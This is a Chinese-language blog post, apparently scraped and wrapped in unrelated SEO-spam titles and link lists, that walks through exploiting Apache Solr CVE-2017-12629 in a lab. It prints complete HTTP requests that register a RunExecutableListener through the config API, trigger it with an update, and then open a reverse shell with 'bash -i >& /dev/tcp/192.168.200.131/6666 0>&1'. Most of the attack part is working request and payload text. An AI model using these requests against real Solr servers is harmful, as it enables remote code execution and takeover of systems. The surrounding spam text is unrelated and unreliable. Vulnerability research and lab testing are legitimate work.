当前位置: 首页 > news >正文

aspcms上传到虚拟主机后打开网站搜索引擎营销成功案例

aspcms上传到虚拟主机后打开网站,搜索引擎营销成功案例,做兼职 那个网站靠谱,站长工具seo综合查询网Apache Solr 远程命令执行漏洞(CVE-2017-12629) Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个…

Apache Solr 远程命令执行漏洞(CVE-2017-12629)

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。

攻击者可以通过发送HTTP POST请求到Solr的配置API,添加一个新的事件监听器,这个监听器可以配置为在Solr的某些事件发生时执行特定的命令。当Solr的特定事件发生时(如提交更改),Solr就会执行这些命令。这是一个无回显的RCE漏洞。

影响版本:Apache Solr < 7.1 Apache Lucene < 7.1

url:http://192.168.200.142:8983/solr/demo/config
http://192.168.200.142:8983/solr/demo/update

RCEpoc

创建listener

数据包

POST /solr/demo/config HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/ccc9wy"]}}

在这里插入图片描述

进行update操作,触发添加的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157[{"id":"test"}]

在这里插入图片描述

进入docker容器,查看,ccc9wy文件创建成功

在这里插入图片描述

反弹shell

设置监听器

POST /solr/demo/config HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157{"add-listener":{"event":"postCommit","name":"newlistener1","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.200.131/6666 0>&1"]}}

在这里插入图片描述

执行update操作,触发listener

在这里插入图片描述

成功获取反弹shell

在这里插入图片描述

http://www.dt0577.cn/news/17775.html

相关文章:

  • wordpress标题省略天津搜索引擎seo
  • 网站建设客服与客户的对话住房和城乡建设部官网
  • 做外贸网站怎么访问外国网站莆田百度快照优化
  • 企业网站怎么做html简单网页设计作品
  • 上海招聘网官方网站广告投放代理商加盟
  • 网站搭建排名优化网络营销策略研究论文
  • 易橙云做的网站怎么样百度人工申诉客服电话
  • 徐汇网站推广搜索引擎优化是什么?
  • 南京网站设公司中国万网
  • 网站ftp做网站的会给嘛手机百度免费下载
  • 扬中网站制作公司最新的新闻 今天
  • 怎么做网站设查权重的软件
  • 网络公司网站建设首页重庆关键词优化服务
  • 做网站公司需要帮客户承担广告法吗百度电话怎么转人工
  • 个人网站导航模版什么软件能搜索关键词能快速找到
  • ip安装wordpress济南公司网站推广优化最大的
  • nas服务器可以做网站吗百度竞价代运营托管
  • 怎样在工商网站做遗失seo关键词排名教程
  • 网站怎么挂广告app注册推广任务平台
  • 建网站中企动力优最好的免费信息发布平台
  • 动漫网站怎么做地推app推广赚佣金
  • 沈阳正规的男科医院关键词seo排名公司
  • 南京企业网站设计公司500元怎么在百度上发布信息广告
  • 泰兴做网站的公司上海seo优化bwyseo
  • 为什么要加强网站安全建设google优化排名
  • 黄骅网站网络推广和运营的区别
  • 网站被k怎么新闻稿范文300字
  • 厦门专业网站建设网络推广发展
  • 网站开发成本评估网站推广方式有哪些
  • 做封面模板下载网站长沙做搜索引擎的公司